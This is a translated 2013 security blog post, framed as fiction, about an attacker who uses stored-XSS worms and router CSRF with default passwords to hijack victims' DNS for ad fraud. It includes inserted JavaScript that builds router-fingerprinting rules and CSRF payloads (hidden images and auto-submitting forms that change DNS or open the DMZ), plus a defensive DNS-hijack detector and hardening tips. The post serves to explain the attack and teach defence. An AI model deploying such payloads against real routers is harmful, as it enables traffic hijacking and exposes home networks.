Huang Xiaohun 2013/10/31 12:13

0x00 Environment Analysis


The recent uproar over the D-Link backdoor had everyone in a panic. "Good thing I don't use D-Link", and that's the end of it? Can users actually patch the hole, and will the vendor notify them in time so they don't get hit? Obviously, nobody did either.

For one thing, the moment a "XXX vulnerability in XXX router" is announced, it embarrasses the vendor. Users won't upgrade anyway (who is bored enough to flash router firmware while their Internet is working fine?), and the announcement only puts PR pressure on the company, so nobody does it.

So we can sum up a few points:

Users won't fix router bugs! Vendors don't want to fix them! Users are too lazy to patch!

0x01 Where the vulnerabilities come from


Router vulnerabilities are rare. Most of them are remote command execution, backdoors, XSS and the like, but the ones in the big shots' hands are all remote command execution, and they basically cover the X series, the pricey routers used in data centers.

But for an ordinary loser hacker like our Hei Kuo (the "black broad" of the machine translation), APT holds no interest; he prefers the routers girls use.

So Hei Kuo went to the computer market, walked up to the router wholesaler, handed the boss 50 yuan and said he wanted to test the performance of his best-selling routers. Seeing the money, the boss fetched twenty routers. Hei Kuo grinned at them, flashing his big gold tooth, fired up several copies of WVS (Acunetix Web Vulnerability Scanner) and scanned like mad, then carefully recorded the vulnerabilities model by model.

In this way, spending less than 200 yuan a day, our hero catalogued all kinds of bugs in the mainstream routers sold in China (→*→, what a shameless guy).

0x02 The evil forces emerge


After Hei Kuo finished scanning and closed his notebook with satisfaction, the router boss was secretly gloating about the money he had made off a sucker... What he didn't know was that this was only the beginning of the game.

After a day of hard fighting, the loser hacker Hei Kuo sat down at a roadside fried-noodle stall. Watching the workers hauling bricks next door, he always felt a kind of fellow feeling; watching the foreman drive off in his BMW in the distance, Hei Kuo resolved to keep working hard and roared at the sky: boss, two fried noodles, extra meat!!

After eating his fill, Hei Kuo went to a board-game cafe and picked a quiet corner. Why a board-game cafe? He told me: 75 yuan for 6 hours, unlimited drink refills, and most importantly there is 20M Wi-Fi; the rich kids there are busy entertaining girls, so nobody competes with him for bandwidth, the air is dozens of times better than an Internet cafe, and when he tires of cranking out code he can look at the pretty girl at the next table (→*→, ahem. I just want to say, please take me along next time!!)

Hei Kuo opened his laptop, took to the greasy keyboard, opened several WVS reports, picked out the command execution, CSRF, XSS and unauthorized-access vulnerabilities and classified them, marked whether each one was controllable, and sorted the POST and GET requests of each function.

Just like that... a generic router vulnerability library was done.

These vulnerabilities were loaded into his own XSS platform and several rules were laid out. The page title identifies the router's brand, then the model is matched... For the various postures: where the CSRF is controllable, it is fired straight at the router; where it isn't, the default password is used. He told me that the chance of getting in directly is actually small, but the chance of getting in through CSRF plus the default password is very high... (This shows how much router security awareness needs to improve; don't think that being on an internal network means you can't be reached... an unchanged default password is the posture that gets you.)

There are many ways to get into a router, but the DMZ and the DNS settings are the two most people care about.

For example, use CSRF to turn on the router's DMZ function, exposing the target host to the public network...
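The rule-driven part of the platform described above (fingerprint by page title, match brand and model, fire a controllable CSRF or fall back to the default password, rewrite DNS or enable the DMZ), as an added example that is not part of the original post. Every brand name, gateway address, path, parameter name and default credential below is a hypothetical placeholder standing in for a real rule, not a real vendor endpoint, and the IP addresses come from the 203.0.113.0/24 documentation range.

```javascript
// Added example (not from the original post): a rule table that maps a router
// admin page's <title> to brand and model, and builds the cross-site request
// that rewrites the router's DNS servers or enables its DMZ.
// All brands, gateways, paths, parameters and credentials are hypothetical.

const ROUTER_RULES = [
  {
    brand: "ExampleBrand-A",
    titleRe: /^ExampleBrand-A\s+(\w+)\s+Router/i,   // group 1 = model
    gateway: "192.168.1.1",
    csrfControllable: false,                        // needs the default password
    defaultCreds: { user: "admin", pass: "admin" },
    actions: {
      dns: { method: "POST", path: "/dns.cgi",
             params: (a) => ({ dns1: a.primary, dns2: a.secondary, save: "1" }) },
      dmz: { method: "POST", path: "/dmz.cgi",
             params: (a) => ({ dmz_enable: "1", dmz_host: a.host }) },
    },
  },
  {
    brand: "ExampleBrand-B",
    titleRe: /^(\w+)\s+-\s+ExampleBrand-B/i,        // group 1 = model
    gateway: "192.168.0.1",
    csrfControllable: true,                         // victim's session cookie is enough
    defaultCreds: null,
    actions: {
      dns: { method: "GET", path: "/apply.cgi",
             params: (a) => ({ action: "setdns", dns_a: a.primary, dns_b: a.secondary }) },
    },
  },
];

// Match the admin page title against the rule table; null when the router is unknown.
function fingerprint(title) {
  for (const rule of ROUTER_RULES) {
    const m = rule.titleRe.exec(title || "");
    if (m) return { rule, brand: rule.brand, model: m[1] };
  }
  return null;
}

// Build the request for one action. When the rule is not CSRF-controllable the
// default credentials go into the URL userinfo, the 2013-era trick the post
// relies on; current browsers strip or block credentials in subresource URLs.
function buildCsrfRequest(rule, action, args) {
  const spec = rule.actions[action];
  if (!spec) return null;
  if (!rule.csrfControllable && !rule.defaultCreds) return null;
  const auth = rule.csrfControllable
    ? ""
    : `${encodeURIComponent(rule.defaultCreds.user)}:${encodeURIComponent(rule.defaultCreds.pass)}@`;
  const base = `http://${auth}${rule.gateway}${spec.path}`;
  const params = new URLSearchParams(spec.params(args));
  return spec.method === "GET"
    ? { method: "GET", url: `${base}?${params}`, body: "" }
    : { method: "POST", url: base, body: params.toString() };
}

// Minimal HTML attribute escaping for the rendered payload.
function escapeAttr(s) {
  return String(s).replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/</g, "&lt;");
}

// Render the request as the HTML a stored-XSS payload would inject into the
// victim's page: an <img> for GET, an auto-submitting hidden form for POST.
function renderPayload(req) {
  if (req.method === "GET") return `<img src="${escapeAttr(req.url)}" style="display:none">`;
  const inputs = Array.from(new URLSearchParams(req.body))
    .map(([k, v]) => `<input type="hidden" name="${escapeAttr(k)}" value="${escapeAttr(v)}">`)
    .join("");
  return `<form id="f" method="POST" action="${escapeAttr(req.url)}">${inputs}</form>` +
         `<script>document.getElementById("f").submit()</script>`;
}

// Sample run on a constructed title.
const hit = fingerprint("ExampleBrand-A WR123 Router");
if (hit) {
  const req = buildCsrfRequest(hit.rule, "dns", { primary: "203.0.113.53", secondary: "203.0.113.54" });
  console.log(hit.brand, hit.model, req.method, req.url, req.body);
  console.log(renderPayload(req));
}
```

Two things follow directly from the code and explain point 1 of the summary: the payload has to hard-code both the gateway address and the default credentials, so a router on an unexpected address with a changed password matches no rule at all.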

0x03 Firing a gun takes more than bullets; it takes a gun


The last trip to the computer market cost several hundred yuan, which left Hei Kuo's finances a bit tight. In the days that followed he moved his XSS platform to a fairly good VPS in Japan, since he was afraid of the heavy traffic that would come later. (Oh, the big shot had foresight.)

Hei Kuo pinched pennies and skipped the fried noodles that week, living on a few big steamed buns and water every day, and finally saved up enough to rent a server in the United States. He spent a night setting it up as a DNS server, flashed his big gold tooth, and went to sleep laughing.

0x04 The early dawn is always the quietest


These days he started living jet-lagged: sleeping during the day, playing video games at night or going out for barbecue with his buddies, and shifting the penetration work to the night.

Every day online he looked for big sites, found the places where users can interact with the site and submit data, and wrote them down. Late at night he started on the various bypasses, then built worms and fed them into his XSS platform, not forgetting to have the worm take a pass at the victim's router while it spreads!!

Late at night the ops guy is asleep and the developer is still in his girlfriend's bed... So once the worm is planted it does not trigger right away; it waits until the user online rate is high (for example 8:00 to 10:30 in the morning, 11:30 to 1:00 at noon, and 8:00 to 10:30 in the evening) and then triggers the stored XSS found a few days earlier.

During the day Hei Kuo didn't stop either, looking all over for advertising to run. Many people doubted he could find that much traffic; Hei Kuo just smiled and silently took down the list.

0x05 Like a spring breeze overnight, a thousand trees of chrysanthemums bloom


To make sure his tests worked, Hei Kuo deployed the platform right at midnight, switching the XSS platform rules to full DNS hijacking: where the CSRF was controllable it changed the router's DNS directly, where it wasn't it tried the default password... Different router brands and models map to different rules. So the first person to see the worm forwarded it within the same domain, the number of infected people multiplied several times over, and each victim's router was hijacked to point its DNS at the server he rented in the United States, which resolved names to the ad address... At 10 in the morning, watching the ad page views grow geometrically, Hei Kuo flashed his big gold tooth once again :D

A month later, Hei Kuo drove his supercar past his old work site, looked at the foreman's familiar back, laughed and drove on. Hei Kuo's worm doesn't show off like a white hat who has to pop an alert box to tell people "I pwned you"; it just keeps propagating quietly in the background, so administrators have a hard time noticing it (unless they run a monitoring platform)...

0x06 Summary


Most of the time routers are full of vulnerabilities, and that matters most in a planned APT against a known target: if the target host is known to sit on an internal network and the router is seen to be brand xx-Link model xx, Hei Kuo uses the XSS payload to open the router's DMZ and the target host is exposed directly to the external network.

What does this tell us? A few things:

1. Change the router's default password and its LAN address (for example, change 192.168.1.1 to 192.168.30.1). This defeats CSRF to a large extent, because the payload has to guess both the address and the credentials.

2. Don't visit shady websites, and even if you do, check your data regularly for malicious changes such as the XSS worm.

3. Telecom has also added some interception for routers: whenever a Telecom user's DNS points to a foreign server, Telecom in some areas pops up a prompt that the DNS has been modified... This is only in some areas; I don't know about elsewhere, and Netcom and Unicom don't seem to have this feature at the time of writing.

4. Try not to visit those sites, you know the kind, because they don't just make money on traffic... If you can't help it, at least don't use Internet Explorer; download the action movies when you can, or watch them in a virtual machine.

5. Get ready for Double Eleven and Taobao's various promotions, and install an antivirus. I expect the black hats are expanding their servers right now, worried that the traffic will be too much... so take extra precautions around Double Eleven!!
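Point 3 describes a check the ISP does on the user's behalf; the same comparison can be done on your own machine. What follows is an added example, not part of the original post: a small DNS response parser and a function that compares the A records returned by the resolver your router hands out against those from a resolver you trust. The packets are constructed inline in the form a resolver would return over UDP port 53; the name and the addresses (198.51.100.0/24 for the real site, 203.0.113.0/24 for the ad server) are placeholders from the documentation ranges.

```javascript
// Added example (not from the original post): parse DNS responses and flag a
// resolver whose answers differ from a trusted resolver's, which is what a
// router-level DNS hijack to an ad server looks like from the client side.

// Read a (possibly compressed) domain name at `offset`. Returns the name and
// the offset of the byte after the name in the original (un-jumped) stream.
function readName(buf, offset) {
  const labels = [];
  let pos = offset;
  let next = -1;                       // set when we follow a compression pointer
  for (;;) {
    const len = buf[pos];
    if (len === 0) { pos += 1; break; }
    if ((len & 0xc0) === 0xc0) {       // 11xxxxxx: pointer to an earlier name
      if (next < 0) next = pos + 2;
      pos = ((len & 0x3f) << 8) | buf[pos + 1];
      continue;
    }
    labels.push(buf.toString("ascii", pos + 1, pos + 1 + len));
    pos += 1 + len;
  }
  return { name: labels.join("."), next: next < 0 ? pos : next };
}

// Parse the header, question section and answer section; A records are decoded.
function parseResponse(buf) {
  const flags = buf.readUInt16BE(2);
  const qdcount = buf.readUInt16BE(4);
  const ancount = buf.readUInt16BE(6);
  let pos = 12;
  const questions = [];
  for (let i = 0; i < qdcount; i++) {
    const q = readName(buf, pos);
    questions.push({ name: q.name, type: buf.readUInt16BE(q.next) });
    pos = q.next + 4;                   // QTYPE + QCLASS
  }
  const answers = [];
  for (let i = 0; i < ancount; i++) {
    const n = readName(buf, pos);
    const type = buf.readUInt16BE(n.next);
    const ttl = buf.readUInt32BE(n.next + 4);
    const rdlength = buf.readUInt16BE(n.next + 8);
    const rdata = buf.subarray(n.next + 10, n.next + 10 + rdlength);
    const rr = { name: n.name, type, ttl, address: null };
    if (type === 1 && rdlength === 4) rr.address = Array.from(rdata).join(".");
    answers.push(rr);
    pos = n.next + 10 + rdlength;
  }
  return { id: buf.readUInt16BE(0), isResponse: (flags & 0x8000) !== 0,
           rcode: flags & 0x0f, questions, answers };
}

// Build a one-question, one-A-answer response (used to construct the samples).
function buildResponse(id, name, ip, ttl) {
  const header = Buffer.alloc(12);
  header.writeUInt16BE(id, 0);
  header.writeUInt16BE(0x8180, 2);     // QR=1, RD=1, RA=1, RCODE=NOERROR
  header.writeUInt16BE(1, 4);          // QDCOUNT
  header.writeUInt16BE(1, 6);          // ANCOUNT
  const labels = name.split(".").map((l) =>
    Buffer.concat([Buffer.from([l.length]), Buffer.from(l, "ascii")]));
  const qname = Buffer.concat(labels.concat([Buffer.from([0])]));
  const question = Buffer.concat([qname, Buffer.from([0, 1, 0, 1])]);  // A, IN
  const answer = Buffer.alloc(16);
  answer.writeUInt16BE(0xc00c, 0);     // pointer to the question name at offset 12
  answer.writeUInt16BE(1, 2);          // TYPE A
  answer.writeUInt16BE(1, 4);          // CLASS IN
  answer.writeUInt32BE(ttl, 6);
  answer.writeUInt16BE(4, 10);         // RDLENGTH
  ip.split(".").forEach((o, i) => { answer[12 + i] = Number(o); });
  return Buffer.concat([header, question, answer]);
}

// Compare the A records two resolvers return for the same name.
function detectHijack(trustedPkt, suspectPkt) {
  const t = parseResponse(trustedPkt);
  const s = parseResponse(suspectPkt);
  const expected = new Set(t.answers.filter((a) => a.type === 1).map((a) => a.address));
  const unexpected = s.answers
    .filter((a) => a.type === 1 && !expected.has(a.address))
    .map((a) => a.address);
  return { name: s.questions.length ? s.questions[0].name : null,
           hijacked: unexpected.length > 0, unexpected };
}

// Constructed sample: the trusted resolver returns the site's real address,
// the resolver the router hands out returns the ad server.
const trusted = buildResponse(0x1234, "shop.example", "198.51.100.10", 300);
const suspect = buildResponse(0x1234, "shop.example", "203.0.113.7", 60);
console.log(detectHijack(trusted, suspect));
```

To run this against live resolvers, send the same query through Node's `dns.Resolver` with `setServers()` once for the router-supplied server and once for a server you trust, and feed the raw answers to `detectHijack`. Pick a name whose addresses are stable: names served by CDNs legitimately resolve differently per resolver and would trip the comparison without any hijack.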

Hereby declare: this story is pure fiction, please do not use it for illegal purposes; the consequences have nothing to do with the author of this article. Experts, go easy on me.